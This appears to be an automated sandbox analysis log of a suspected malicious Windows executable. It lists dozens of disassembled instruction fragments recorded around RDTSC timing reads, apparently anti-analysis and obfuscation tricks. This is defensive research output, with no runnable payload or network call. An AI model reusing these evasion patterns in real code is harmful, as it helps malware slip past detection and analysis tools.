Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1121BDC second address: 1121BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE80147AC02h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exe | RDTSC instruction interceptor: First address: 1121BFD second address: 1121C18 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE801498583h 0x00000008 jmp 00007FE80149857Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1121C18 second address: 1121C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC05h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FE80147ABFCh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10C2243 second address: 10C224C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112555F second address: 1125569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE80147ABF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10C8C8C second address: 10C8C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B77 second address: 1124B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B82 second address: 1124B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B8C second address: 1124B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124B91 second address: 1124B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124CC7 second address: 1124CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC00h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FE80147AC02h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124CF3 second address: 1124D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124ECE second address: 1124EF9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE80147AC09h 0x00000008 jmp 00007FE80147AC03h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147ABFEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1124EF9 second address: 1124F11 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jnl 00007FE801498576h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A159 second address: 112A174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80147AC06h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A174 second address: 112A17B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A17B second address: 112A1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jo 00007FE80147AC0Dh 0x0000000e jmp 00007FE80147AC07h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 ja 00007FE80147ABFCh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1B6 second address: 112A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1C8 second address: 112A1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A1CC second address: 112A1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A2EB second address: 112A307 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE80147ABFDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A307 second address: 112A30B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A30B second address: 112A311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A311 second address: 112A326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE801498580h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A326 second address: 112A33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FE80147AC04h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FE80147ABF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A33D second address: 112A35C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE801498583h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A3F0 second address: 112A3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 112A3F4 second address: 112A439 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE801498580h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FE801498582h 0x00000014 jnl 00007FE80149857Ch 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE801498584h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130570 second address: 1130578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130B2B second address: 1130B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498585h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1130B44 second address: 1130B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11310E7 second address: 1131128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE801498588h 0x0000000d jo 00007FE801498591h 0x00000013 jmp 00007FE80149857Dh 0x00000018 jmp 00007FE80149857Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131128 second address: 113112F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113126E second address: 1131272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131272 second address: 11312A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE80147ABFEh 0x0000000b push esi 0x0000000c jl 00007FE80147ABF6h 0x00000012 jo 00007FE80147ABF6h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE80147ABFFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1131681 second address: 1131697 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FE801498576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136EEB second address: 1136EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135BF7 second address: 1135BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135BFD second address: 1135C03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135C03 second address: 1135C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE801498576h 0x0000000a jmp 00007FE801498587h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135D9D second address: 1135DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FE80147AC0Bh 0x0000000f jmp 00007FE80147ABFFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F04 second address: 1135F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F0A second address: 1135F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE80147ABFCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F21 second address: 1135F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F25 second address: 1135F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1135F29 second address: 1135F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498589h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113637F second address: 113639D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE80147AC03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113639D second address: 11363AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FE80149857Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11358A2 second address: 11358A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136C2C second address: 1136C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1136C30 second address: 1136C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FE80147ABF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11399EF second address: 1139A0B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE801498578h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jg 00007FE801498576h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1139A0B second address: 1139A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1139A14 second address: 1139A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DFD5 second address: 113DFDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DFDA second address: 113DFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1108F1F second address: 1108F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1108F23 second address: 10EBA68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b call dword ptr [ebp+122D2539h] 0x00000011 push eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110906A second address: 110906E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109902 second address: 1109919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498583h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109919 second address: 1109959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or dword ptr [ebp+122D21A1h], ecx 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FE80147ABF8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D1991h], ecx 0x00000031 adc edi, 2AACF7BFh 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push ecx 0x0000003b push edi 0x0000003c pop edi 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109959 second address: 110997B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE801498580h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f js 00007FE80149857Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109E52 second address: 1109E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109FBA second address: 1109FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FE801498576h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1109FC7 second address: 1109FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110A075 second address: 110A12A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE801498576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FE801498578h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FE801498578h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e lea eax, dword ptr [ebp+1248EC1Dh] 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FE801498578h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e jmp 00007FE80149857Ah 0x00000053 nop 0x00000054 jnc 00007FE80149858Ah 0x0000005a push eax 0x0000005b pushad 0x0000005c jmp 00007FE801498583h 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FE801498589h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 110A12A second address: 10EC635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FE80147ABF8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+1247BF1Ch], ebx 0x00000028 call 00007FE80147ABFDh 0x0000002d mov ecx, 311A0ABFh 0x00000032 pop edx 0x00000033 call dword ptr [ebp+122D3939h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10EC635 second address: 10EC63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10EC63A second address: 10EC65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE80147AC15h 0x00000008 jmp 00007FE80147AC09h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113D1B5 second address: 113D1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FE801498585h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE801498583h 0x00000013 je 00007FE801498576h 0x00000019 popad 0x0000001a jp 00007FE80149857Eh 0x00000020 push esi 0x00000021 pop esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113D1F7 second address: 113D20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FE80147ABF6h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DB9E second address: 113DBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE80149858Bh 0x0000000b jmp 00007FE801498585h 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FE801498576h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 113DBC6 second address: 113DBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147333 second address: 1147339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147339 second address: 1147359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE80147ABF6h 0x0000000a popad 0x0000000b jo 00007FE80147AC02h 0x00000011 jg 00007FE80147ABF6h 0x00000017 jbe 00007FE80147ABF6h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147359 second address: 1147366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147366 second address: 1147370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147370 second address: 1147374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147374 second address: 1147378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147378 second address: 1147389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FE801498576h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1147625 second address: 114763D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE80147ABF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE80147ABFEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11477BE second address: 11477C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 11477C2 second address: 11477C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 1146BF1 second address: 1146C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FE801498576h 0x0000000d jg 00007FE801498576h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007FE801498588h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
